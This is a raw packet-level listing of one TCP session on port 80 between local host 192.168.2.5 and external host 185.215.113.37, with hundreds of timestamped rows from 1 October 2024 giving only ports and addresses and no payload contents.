Oct 1, 2024 19:32:13.350945950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.350950956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.350963116 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.350985050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.351002932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351008892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.351013899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351023912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351051092 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.351078987 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.351094007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351104021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351114035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351124048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351134062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351141930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.351145029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351155043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351164103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.351166964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351182938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.351191998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.351217985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.351253033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351263046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351273060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351283073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351294041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351304054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.351305008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351329088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.351340055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351349115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.351349115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351361036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351371050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351378918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351394892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.351412058 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.351443052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.351526022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351535082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351543903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351574898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.351596117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.351603031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351613045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351623058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351650000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.351672888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.351685047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351695061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.351725101 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.351738930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.351974964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352020979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.352025986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352035999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352066040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.352071047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352080107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.352082968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352094889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352116108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.352143049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.352221012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352231026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352241039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352252007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352262974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352272034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.352272987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352300882 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.352308035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.352330923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352341890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352350950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352360964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352375984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352376938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.352386951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352396011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.352396965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352406979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352416039 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.352454901 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.352467060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352485895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352495909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352505922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352513075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.352516890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352530003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352538109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.352540016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352562904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.352576017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.352734089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352750063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352760077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352770090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352778912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352783918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352788925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352797031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.352797985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352808952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352817059 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.352818012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352828026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352838039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352848053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352857113 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.352865934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352875948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352880955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352890968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352891922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.352896929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.352899075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.352921009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.352955103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.437489033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437505960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437516928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437552929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437563896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437575102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437587023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.437592030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437604904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437613964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.437617064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437628984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437628984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.437640905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437653065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437665939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.437700987 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.437740088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437752008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437762022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437772989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437782049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437788010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.437793970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437805891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437813997 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.437818050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437829971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437839985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.437854052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.437874079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437875986 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.437886953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437897921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437908888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437916040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.437922001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.437926054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.437958002 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438005924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438016891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438028097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438039064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438050985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438054085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438071966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438087940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438163996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438174009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438182116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438191891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438199043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438210011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438221931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438229084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438234091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438245058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438257933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438258886 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438272953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438302994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438316107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438328028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438338041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438350916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438360929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438366890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438373089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438384056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438386917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438397884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438405991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438435078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438437939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438447952 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438472986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438477993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438484907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438514948 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438523054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438566923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438657045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438690901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438700914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438704014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438740015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438740015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438757896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438769102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438780069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438790083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438800097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438829899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438863039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438874006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438884974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438910007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438913107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438921928 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438925028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438937902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.438951969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438981056 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438981056 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.438996077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439007998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439018011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439028978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439040899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439043045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439054012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439090014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439090014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439107895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439115047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439126968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439136982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439147949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439158916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439168930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439169884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439188004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439188004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439198971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439210892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439212084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439223051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439229012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439235926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439249039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439266920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439276934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439286947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439286947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439322948 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439359903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439413071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439423084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439435005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439469099 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439476013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439486980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439496994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439534903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439534903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439547062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439558983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439568996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439579964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439598083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439614058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439620018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439625978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439636946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439649105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439660072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439660072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439677000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439717054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439735889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439748049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439764977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439775944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439780951 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439789057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439799070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439800978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439810038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439831018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439856052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439873934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439884901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439894915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439908028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439914942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439919949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439932108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439943075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439945936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439954996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.439977884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.439986944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.524333000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.524389982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.524400949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.524422884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.524430037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.524432898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.524444103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.524456024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.524493933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.524502993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.524503946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.524513006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.524550915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.524560928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.524571896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.524580956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.524591923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.524622917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.524622917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.524635077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.524645090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.524655104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.524663925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.524669886 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.524673939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:13.524674892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.524730921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.524730921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:13.524738073 CEST	80	49704	185.215.113.37	192.168.2.5
